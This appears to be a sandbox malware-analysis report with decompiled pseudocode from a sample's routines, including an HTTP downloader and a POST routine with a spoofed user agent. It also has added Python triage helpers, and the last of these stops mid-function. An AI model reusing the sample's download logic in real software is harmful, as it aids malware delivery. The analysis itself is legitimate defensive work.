                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                  • String ID: (A$<$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                  • API String ID: 2761394606-712686588
                                                                                  • Opcode ID: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction ID: 9d1df4d468acb1d33fa47fc6a9b1e55a6919e6c831fa6972c8ee7f2cc9406756
                                                                                  • Opcode Fuzzy Hash: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction Fuzzy Hash: 43511CB59012289BDB26CF94DC54BE973BDAB48705F1081E9B50DA6280D7B8AFC4CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 92%
                                                                                  			E0040E480(intOrPtr* __edi) {
                                                                                  				void* __esi;
                                                                                  				void* _t25;
                                                                                  				long _t40;
                                                                                  				intOrPtr* _t53;
                                                                                  				intOrPtr* _t55;
                                                                                  				void* _t56;
                                                                                  				LONG* _t62;
                                                                                  
                                                                                  				_t53 = __edi;
                                                                                  				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                  					return _t25;
                                                                                  				} else {
                                                                                  					_t1 = _t53 + 0x20; // 0x20
                                                                                  					EnterCriticalSection(_t1);
                                                                                  					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                  					if(_t55 == 0) {
                                                                                  						L11:
                                                                                  						_t13 = _t53 + 0x20; // 0x20
                                                                                  						LeaveCriticalSection(_t13);
                                                                                  						SetEvent( *(_t53 + 0x10));
                                                                                  						_t56 = 0;
                                                                                  						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                  							L14:
                                                                                  							E0040C040( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                  							E0040C180( *((intOrPtr*)(_t53 + 0xc)));
                                                                                  							CloseHandle( *(_t53 + 8));
                                                                                  							CloseHandle( *(_t53 + 0x10));
                                                                                  							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                  							E00409940( *((intOrPtr*)(_t53 + 0x14)));
                                                                                  							_t24 = _t53 + 0x20; // 0x20
                                                                                  							DeleteCriticalSection(_t24);
                                                                                  							return E00408FB0(_t53);
                                                                                  						}
                                                                                  						do {
                                                                                  							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                  							_t56 = _t56 + 1;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                  						goto L14;
                                                                                  					} else {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  					do {
                                                                                  						L3:
                                                                                  						if( *_t55 == 0x69636c69) {
                                                                                  							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                  								_t62 = _t55 + 0x21c;
                                                                                  								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                  								if(_t40 == 0) {
                                                                                  									 *(_t55 + 0x230) = _t40;
                                                                                  									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                  									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                  									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                  									InterlockedIncrement(_t62);
                                                                                  									if(E0040EAD0(_t55) == 0) {
                                                                                  										InterlockedDecrement(_t62);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                  					} while (_t55 != 0);
                                                                                  					goto L11;
                                                                                  				}
                                                                                  			}
                                                                                  0x0040e480
                                                                                  0x0040e482
                                                                                  0x0040e5b7
                                                                                  0x0040e494
                                                                                  0x0040e496
                                                                                  0x0040e49a
                                                                                  0x0040e4a0
                                                                                  0x0040e4a5
                                                                                  0x0040e530
                                                                                  0x0040e530
                                                                                  0x0040e534
                                                                                  0x0040e53e
                                                                                  0x0040e544
                                                                                  0x0040e549
                                                                                  0x0040e563
                                                                                  0x0040e569
                                                                                  0x0040e572
                                                                                  0x0040e584
                                                                                  0x0040e58a
                                                                                  0x0040e590
                                                                                  0x0040e59a
                                                                                  0x0040e5a2
                                                                                  0x0040e5a6
                                                                                  0x00000000
                                                                                  0x0040e5b6
                                                                                  0x0040e551
                                                                                  0x0040e55b
                                                                                  0x0040e55d
                                                                                  0x0040e55e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e4ab
                                                                                  0x0040e4ab
                                                                                  0x0040e4b1
                                                                                  0x0040e4d3
                                                                                  0x0040e4d7
                                                                                  0x0040e4de
                                                                                  0x0040e4e6
                                                                                  0x0040e4ec
                                                                                  0x0040e4f2
                                                                                  0x0040e4fc
                                                                                  0x0040e502
                                                                                  0x0040e50c
                                                                                  0x0040e519
                                                                                  0x0040e51c
                                                                                  0x0040e51c
                                                                                  0x0040e519
                                                                                  0x0040e4e6
                                                                                  0x0040e4d3
                                                                                  0x0040e522
                                                                                  0x0040e528
                                                                                  0x00000000
                                                                                  0x0040e4ab

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00000020,0040BD00,?,0040F024), ref: 0040E49A
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E4C6
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E4DE
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040E50C
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E51C
                                                                                  • LeaveCriticalSection.KERNEL32(00000020,?,0040F024), ref: 0040E534
                                                                                  • SetEvent.KERNEL32(?,?,0040F024), ref: 0040E53E
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040F024), ref: 0040E55B
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E584
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E58A
                                                                                  • WSACloseEvent.WS2_32(?), ref: 0040E590
                                                                                  • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040F024), ref: 0040E5A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 2403999931-3762367603
                                                                                  • Opcode ID: 8dd6da6e97fa57f1a7193440fcc103113cb784ba75cd11bc1955a2a87b358bb7
                                                                                  • Instruction ID: 93d8e349b18169af685d7a21951132cbb8c9c0fe64a1f5b9dbcdc35934fd6ed3
                                                                                  • Opcode Fuzzy Hash: 8dd6da6e97fa57f1a7193440fcc103113cb784ba75cd11bc1955a2a87b358bb7
                                                                                  • Instruction Fuzzy Hash: D3317475500705BBC710DBB1EC48B97B7A8BF08314F048E2EE95AA3691D778F864CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 68%
                                                                                  			E00404000() {
                                                                                  				struct HWND__* _v8;
                                                                                  				struct tagMSG _v36;
                                                                                  				struct _WNDCLASSEXW _v84;
                                                                                  				short _v596;
                                                                                  				unsigned int _t20;
                                                                                  				void* _t39;
                                                                                  				void* _t40;
                                                                                  
                                                                                  				do {
                                                                                  					_v84.cbSize = 0;
                                                                                  					memset( &(_v84.style), 0, 0x2c);
                                                                                  					_t40 = _t39 + 0xc;
                                                                                  					_v84.cbSize = 0x30;
                                                                                  					_v84.lpfnWndProc = E00403DB0;
                                                                                  					_v84.hInstance = GetModuleHandleW(0);
                                                                                  					_v84.lpszClassName =  &_v596;
                                                                                  					do {
                                                                                  						Sleep(1);
                                                                                  						_t20 = GetTickCount();
                                                                                  						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                  						_t40 = _t40 + 0x10;
                                                                                  					} while ((RegisterClassExW( &_v84) & 0x0000ffff) == 0);
                                                                                  					_v8 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0);
                                                                                  					if(_v8 != 0) {
                                                                                  						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                  							TranslateMessage( &_v36);
                                                                                  							DispatchMessageA( &_v36);
                                                                                  						}
                                                                                  						goto L7;
                                                                                  					}
                                                                                  					break;
                                                                                  					L7:
                                                                                  				} while (0 != 0);
                                                                                  				ExitThread(0);
                                                                                  			}
                                                                                  0x00404009
                                                                                  0x00404009
                                                                                  0x00404018
                                                                                  0x0040401d
                                                                                  0x00404020
                                                                                  0x00404027
                                                                                  0x00404036
                                                                                  0x0040403f
                                                                                  0x00404042
                                                                                  0x00404044
                                                                                  0x0040404a
                                                                                  0x00404066
                                                                                  0x0040406c
                                                                                  0x0040407c
                                                                                  0x004040a2
                                                                                  0x004040a9
                                                                                  0x004040ad
                                                                                  0x004040c5
                                                                                  0x004040cf
                                                                                  0x004040cf
                                                                                  0x00000000
                                                                                  0x004040ad
                                                                                  0x00000000
                                                                                  0x004040d7
                                                                                  0x004040d7
                                                                                  0x004040e1

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                  • String ID: %x%X$0
                                                                                  • API String ID: 716646876-225668902
                                                                                  • Opcode ID: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction ID: 19d221db94b3e63cef1269c4be0118e099b5cb739eae60d914623c84e45eccf5
                                                                                  • Opcode Fuzzy Hash: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction Fuzzy Hash: 3021F170A40318ABEB109BE0DC49FEE7B78BB44701F508129F705B61D0DBB955448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 530 40c610-40c6ab memset InternetCrackUrlA InternetOpenA 531 40c6b1-40c6e4 InternetConnectA 530->531 532 40c827-40c830 530->532 533 40c81a-40c821 InternetCloseHandle 531->533 534 40c6ea-40c71a HttpOpenRequestA 531->534 533->532 535 40c720-40c737 HttpSendRequestA 534->535 536 40c80d-40c814 InternetCloseHandle 534->536 537 40c800-40c807 InternetCloseHandle 535->537 538 40c73d-40c741 535->538 536->533 537->536 539 40c7f6 538->539 540 40c747 538->540 539->537 541 40c751-40c758 540->541 542 40c7e9-40c7f4 541->542 543 40c75e-40c780 InternetReadFile 541->543 542->537 544 40c782-40c789 543->544 545 40c78b 543->545 544->545 546 40c78d-40c7e4 call 408ea0 memcpy 544->546 545->542 546->541
                                                                                  C-Code - Quality: 82%
                                                                                  			E0040C610(char* _a4, char** _a8) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				long _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char* _v852;
                                                                                  				void _v1876;
                                                                                  				long _v1880;
                                                                                  				void* _t87;  /* request handle copy used inside the read loop; missing from the decompiler's local list */
                                                                                  				void* _t91;
                                                                                  				void* _t92;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t92 = _t91 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                  								if(_a8 == 0) {
                                                                                  									_v776 = 1;
                                                                                  								} else {
                                                                                  									_v852 = 0;
                                                                                  									while(1 != 0) {
                                                                                  										_t87 = _v848;
                                                                                  										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                  											_v776 = E00408EA0(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                  											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                  											_t92 = _t92 + 0x14;
                                                                                  											_v852 =  &(_v852[_v1880]);
                                                                                  											continue;
                                                                                  										}
                                                                                  										break;
                                                                                  									}
                                                                                  									 *_a8 = _v852;
                                                                                  								}
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}
                                                                                  0x0040c619
                                                                                  0x0040c623
                                                                                  0x0040c638
                                                                                  0x0040c63d
                                                                                  0x0040c640
                                                                                  0x0040c650
                                                                                  0x0040c656
                                                                                  0x0040c666
                                                                                  0x0040c66c
                                                                                  0x0040c688
                                                                                  0x0040c69e
                                                                                  0x0040c6ab
                                                                                  0x0040c6d7
                                                                                  0x0040c6e4
                                                                                  0x0040c70d
                                                                                  0x0040c71a
                                                                                  0x0040c737
                                                                                  0x0040c741
                                                                                  0x0040c7f6
                                                                                  0x0040c747
                                                                                  0x0040c747
                                                                                  0x0040c751
                                                                                  0x0040c771
                                                                                  0x0040c780
                                                                                  0x0040c7a9
                                                                                  0x0040c7ca
                                                                                  0x0040c7cf
                                                                                  0x0040c7de
                                                                                  0x00000000
                                                                                  0x0040c7de
                                                                                  0x00000000
                                                                                  0x0040c780
                                                                                  0x0040c7f2
                                                                                  0x0040c7f2
                                                                                  0x0040c741
                                                                                  0x0040c807
                                                                                  0x0040c807
                                                                                  0x0040c814
                                                                                  0x0040c814
                                                                                  0x0040c821
                                                                                  0x0040c821
                                                                                  0x0040c830

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040C638
                                                                                  • InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040C7CA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C814
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C821
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                  • String ID: <$GET
                                                                                  • API String ID: 1205665004-427699995
                                                                                  • Opcode ID: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction ID: 09436683f8244ffa9c701ea93985ed9ede5934815d9b1926990d38fc667447ad
                                                                                  • Opcode Fuzzy Hash: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction Fuzzy Hash: 29512C759012289BDB35CB50CC99BD9B3BCAB48705F1081E9E60DAA2C0D7B86FC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
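
Added example, not part of the Joe Sandbox report or of the sample: a small Python parser for the `APIs` bullets recorded for the routine above. It recovers the call sequence from the bullet lines, checks it against the WinINet download chain (InternetOpen, InternetConnect, HttpOpenRequest, HttpSendRequest, InternetReadFile, in that order) and pulls the HTTP verb, the service type and the read chunk size out of the recorded arguments. The bullet lines embedded in the block are copied from this report; the argument positions come from the documented WinINet signatures (second argument of HttpOpenRequestA is the verb, sixth of InternetConnectA is dwService, third of InternetReadFile is the byte count).

```python
import re
from dataclasses import dataclass

# Joe Sandbox lists one call per bullet: "• Name.MODULE(arg,arg,...), ref: ADDR"; the
# argument list is absent for calls whose parameters were not captured (memset here).
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed input: the APIs bullets of the download routine as printed in this report.
SAMPLE_APIS = """
• memset.NTDLL ref: 0040C638
• InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
• HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
• memcpy.NTDLL(00000000,?,00000000), ref: 0040C7CA
• InternetCloseHandle.WININET(00000000), ref: 0040C807
• InternetCloseHandle.WININET(00000000), ref: 0040C814
• InternetCloseHandle.WININET(00000000), ref: 0040C821
""".strip().splitlines()


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int

    @property
    def base(self):
        """Drop the A/W suffix so InternetOpenA and InternetOpenW compare equal."""
        return re.sub(r"[AW]$", "", self.name)


def parse_api_line(line):
    """One bullet -> ApiCall, or None for any line that is not an API bullet."""
    m = API_LINE.match(line)
    if m is None:
        return None
    raw = m.group("args")
    args = tuple(a.strip() for a in raw.split(",")) if raw else ()
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def call_chain(lines):
    """Keep the report's own order (ascending instruction address); skip non-API lines."""
    return [c for c in map(parse_api_line, lines) if c is not None]


WININET_DOWNLOAD = ("InternetOpen", "InternetConnect", "HttpOpenRequest",
                    "HttpSendRequest", "InternetReadFile")


def contains_in_order(chain, pattern):
    """True when pattern occurs as a subsequence of the chain's base names."""
    pos = 0
    for call in chain:
        if pos < len(pattern) and call.base == pattern[pos]:
            pos += 1
    return pos == len(pattern)


def first(chain, base):
    return next((c for c in chain if c.base == base), None)


def summarize(lines):
    """Triage view of one routine's API list."""
    chain = call_chain(lines)
    open_req = first(chain, "HttpOpenRequest")
    connect = first(chain, "InternetConnect")
    read = first(chain, "InternetReadFile")
    return {
        "wininet_download": contains_in_order(chain, WININET_DOWNLOAD),
        # HttpOpenRequestA(hConnect, lpszVerb, lpszObjectName, ...): verb is argument 1
        "verb": open_req.args[1] if open_req else None,
        # InternetConnectA(..., lpszUserName, lpszPassword, dwService, ...): 3 == INTERNET_SERVICE_HTTP
        "service": "INTERNET_SERVICE_HTTP" if connect and connect.args[5] == "00000003" else None,
        # InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, ...): hex literal in the report
        "chunk": int(read.args[2], 16) if read else None,
        "handles_closed": sum(1 for c in chain if c.base == "InternetCloseHandle"),
    }
```

Run over the bullets above this yields a GET over INTERNET_SERVICE_HTTP read in 0x400-byte chunks with three handles closed; the same function can be pointed at every `APIs` block of a report to find other routines that carry the download chain.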

                                                                                  C-Code - Quality: 80%
                                                                                  			E0040C040(LONG* _a4, intOrPtr _a8) {
                                                                                  				int _v8;
                                                                                  				long _v12;
                                                                                  				LONG* _v16;
                                                                                  				signed char _v17;
                                                                                  				long _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _t57;
                                                                                  				intOrPtr _t80;
                                                                                  
                                                                                  				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                  				SetThreadPriority(GetCurrentThread(), 0xfffffffe); // THREAD_PRIORITY_LOWEST (-2) while polling; restored at L16
                                                                                  				_v12 = 0;
                                                                                  				if(_a4 != 0) {
                                                                                  					_v16 = _a4;
                                                                                  					if(InterlockedExchangeAdd(_v16, 0) > 0) { // atomic read of the entry count at offset 0
                                                                                  						_v17 = 0 | _a8 != 0xffffffff; // countdown enabled unless _a8 == INFINITE
                                                                                  						while(1 != 0) {
                                                                                  							_v24 = 0;
                                                                                  							EnterCriticalSection( &(_v16[1])); // CRITICAL_SECTION at offset 4 (6 dwords on x86); _v16[7] is the handle array
                                                                                  							_v28 = 0;
                                                                                  							while(_v28 <  *_v16) {
                                                                                  								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                  									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0); // non-blocking poll
                                                                                  									asm("sbb eax, eax"); // neg/sbb/inc: WAIT_OBJECT_0 (0) -> +1, any other status -> +0
                                                                                  									_v24 =  ~_t57 + 1 + _v24; // _v24 counts finished slots; a NULL slot (else branch) also counts
                                                                                  								} else {
                                                                                  									_v24 = _v24 + 1;
                                                                                  								}
                                                                                  								_v28 = _v28 + 1;
                                                                                  							}
                                                                                  							LeaveCriticalSection( &(_v16[1]));
                                                                                  							if(_v24 !=  *_v16) {
                                                                                  								if((_v17 & 0x000000ff) == 0) {
                                                                                  									L15:
                                                                                  									Sleep(1);
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									_t80 = _a8 - 1; // one decrement per Sleep(1) poll, in DWORD arithmetic (a timeout of 0 wraps)
                                                                                  									_a8 = _t80;
                                                                                  									if(_t80 != 0) {
                                                                                  										goto L15;
                                                                                  									} else {
                                                                                  									}
                                                                                  								}
                                                                                  							} else {
                                                                                  								_v12 = 1; // every slot NULL or signaled
                                                                                  							}
                                                                                  							goto L16;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L16:
                                                                                  				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                  				return _v12;
                                                                                  			}

                                                                                  Instruction addresses (per-line address column for the pseudocode above; 0x00000000 marks lines with no instruction): 0x0040c053 0x0040c05f 0x0040c065 0x0040c070 0x0040c079 0x0040c08a 0x0040c099 0x0040c09c 0x0040c0a9 0x0040c0b7 0x0040c0bd 0x0040c0cf 0x0040c0e6 0x0040c102 0x0040c10a 0x0040c112 0x0040c0e8 0x0040c0ee 0x0040c0ee 0x0040c0cc 0x0040c0cc 0x0040c11e 0x0040c12c 0x0040c13d 0x0040c14c 0x0040c14e 0x00000000 0x0040c13f 0x0040c142 0x0040c145 0x0040c148 0x00000000 0x00000000 0x0040c14a 0x0040c148 0x0040c12e 0x0040c12e 0x0040c12e 0x00000000 0x0040c12c 0x0040c09c 0x0040c08a 0x0040c159 0x0040c164 0x0040c170

                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C046
                                                                                  • GetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C04D
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C058
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C05F
                                                                                  • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040C082
                                                                                  • EnterCriticalSection.KERNEL32(000000FB), ref: 0040C0B7
                                                                                  • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040C102
                                                                                  • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040C11E
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040C14E
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C15D
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF), ref: 0040C164
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 3862671961-0
                                                                                  • Opcode ID: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction ID: b67d03a003be484ef9903f40ca498cf56af242f5343ef7d43787b118d94c6999
                                                                                  • Opcode Fuzzy Hash: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction Fuzzy Hash: E9414C74900209EBDB14DFA4D884BAEBB71FB48305F108266E915BB381D7799A81CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
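
Added example, not part of the report or of the sample: a Python model of what E0040C040 does, with threading.Event standing in for a Win32 waitable handle and a Lock for the CRITICAL_SECTION. The structure layout (entry count at offset 0, CRITICAL_SECTION at offset 4, handle-array pointer at offset 0x1c) is read off the pseudocode; the thread-priority change is not modelled. The detail worth checking is the timeout: it is a count of Sleep(1) polls held in a DWORD, so the real wait is at least that many milliseconds and a value of 0 wraps to roughly 2^32 polls.

```python
"""Model of E0040C040: poll a list of handles until every one is signaled,
with the timeout expressed as a number of Sleep(1) polls."""
import threading
import time

INFINITE = 0xFFFFFFFF   # _a8 == 0xffffffff disables the countdown


class WaitGroup:
    """Mirrors the 32-bit structure the routine walks:
    [0] entry count, [1..6] CRITICAL_SECTION (24 bytes), [7] pointer to a handle array."""

    def __init__(self, handles):
        self.count = len(handles)        # read through InterlockedExchangeAdd(&s[0], 0)
        self.lock = threading.Lock()     # EnterCriticalSection(&s[1]) ... LeaveCriticalSection
        self.handles = list(handles)     # s[7]; a None entry stands for a NULL handle


def make_handle(signaled):
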